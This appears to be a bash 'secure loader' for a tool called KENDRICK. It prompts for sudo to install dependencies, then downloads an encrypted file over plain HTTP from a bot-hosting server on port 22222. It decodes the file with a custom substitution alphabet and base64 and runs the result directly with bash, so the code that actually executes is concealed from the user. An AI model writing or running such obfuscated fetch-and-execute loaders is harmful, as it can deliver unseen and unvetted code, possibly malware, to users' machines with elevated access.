#!/bin/bash
# =============================
# KENDRICK Secure Loader
# =============================
# This is the public-facing script. The actual code is encrypted.

# Colors
B_CYAN='\033[1;36m'
B_YELLOW='\033[1;33m'
B_GREEN='\033[1;32m'
B_RED='\033[1;31m'
B_PURPLE='\033[1;35m'
RESET='\033[0m'

clear
echo -e "${B_CYAN}"
cat << "EOF"
 ██╗░░██╗███████╗███╗░░██╗██████╗░██████╗░██╗░█████╗░██╗░░██╗
 ██║░██╔╝██╔════╝████╗░██║██╔══██╗██╔══██╗██║██╔══██╗██║░██╔╝
 █████═╝░█████╗░░██╔██╗██║██║░░██║██████╔╝██║██║░░╚═╝█████═╝░
 ██╔═██╗░██╔══╝░░██║╚████║██║░░██║██╔══██╗██║██║░░██╗██╔═██╗░
 ██║░╚██╗███████╗██║░╚███║██████╔╝██║░░██║██║╚█████╔╝██║░╚██╗
 ╚═╝░░╚═╝╚══════╝╚═╝░░╚══╝╚═════╝░╚═╝░░╚═╝╚═╝░╚════╝░╚═╝░░╚═╝
EOF
echo -e "${RESET}"
echo -e "${B_PURPLE}   >>> Ultimate All In One Tool <<<   ${RESET}"
echo -e "${B_YELLOW}   Loading secure payload...${RESET}\n"

# Check dependencies and auto-install if missing
check_and_install() {
    local cmd=$1
    local pkg=$2
    if ! command -v "$cmd" &> /dev/null; then
        echo -e "${B_YELLOW}[${ICON_WARN} WARN]${RESET} $cmd is missing. Attempting to install $pkg..."
        echo -e "${B_PURPLE}[${ICON_INFO} INFO]${RESET} This script requires sudo access to install dependencies."
        echo -e "${B_CYAN}[${ICON_INFO} INFO]${RESET} Please enter your password if prompted, or run 'sudo su' first."
        
        if command -v apt &> /dev/null; then
            sudo apt update && sudo apt install -y "$pkg"
        elif command -v yum &> /dev/null; then
            sudo yum install -y "$pkg"
        elif command -v pacman &> /dev/null; then
            sudo pacman -S --noconfirm "$pkg"
        elif command -v dnf &> /dev/null; then
            sudo dnf install -y "$pkg"
        elif command -v zypper &> /dev/null; then
            sudo zypper install -y "$pkg"
        else
            echo -e "${B_RED}[${ICON_ERROR} ERROR]${RESET} Could not find a supported package manager."
            echo -e "${B_YELLOW}[${ICON_WARN} WARN]${RESET} Please install $pkg manually."
            exit 1
        fi
        
        if ! command -v "$cmd" &> /dev/null; then
            echo -e "${B_RED}[${ICON_ERROR} ERROR]${RESET} Failed to install $pkg. Please install it manually."
            exit 1
        fi
        echo -e "${B_GREEN}[${ICON_CHECK} OK]${RESET} $pkg installed successfully."
    fi
}

# Add icons if not defined (matching colorfulscript style)
ICON_INFO="ℹ️"
ICON_WARN="⚠️"
ICON_ERROR="❌"
ICON_CHECK="✅"

check_and_install curl curl
check_and_install base64 coreutils
check_and_install tr coreutils

# Download protected script
TEMP_SCRIPT=$(mktemp)
TEMP_DEC=$(mktemp)
trap "rm -f $TEMP_SCRIPT $TEMP_DEC" EXIT

echo -e "${B_CYAN}🔐 Loading secure payload from private server...${RESET}"
if ! curl -fsSL "http://fi7.bot-hosting.net:22222/main.enc" -o "$TEMP_SCRIPT" 2>/dev/null; then
    echo -e "${B_RED}❌ Failed to load payload from secure server${RESET}"
    exit 1
fi

echo -e "${B_YELLOW}🔓 Decrypting...${RESET}"

# Universal Zero-Dependency Unscrambler
# These sets match the ones generated by encrypt.py using your key
_S="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
_T="WdX1A8y+QScwRGkD046oqjNrU2LnJ3pz7HaOi5e9EVICuFMlgKvfPmZbs/TxhYBt"

# Unscramble and Decode
cat "$TEMP_SCRIPT" | tr "$_T" "$_S" | base64 -d > "$TEMP_DEC" 2>/dev/null

if [ $? -ne 0 ]; then
    echo -e "${B_RED}❌ Failed to decrypt payload. Data may be corrupted.${RESET}"
    exit 1
fi

if [ $? -ne 0 ]; then
    echo -e "${B_RED}❌ Failed to decrypt payload${RESET}"
    exit 1
fi

echo -e "${B_GREEN}✅ Ready!${RESET}\n"

# Execute the decrypted script
bash "$TEMP_DEC"
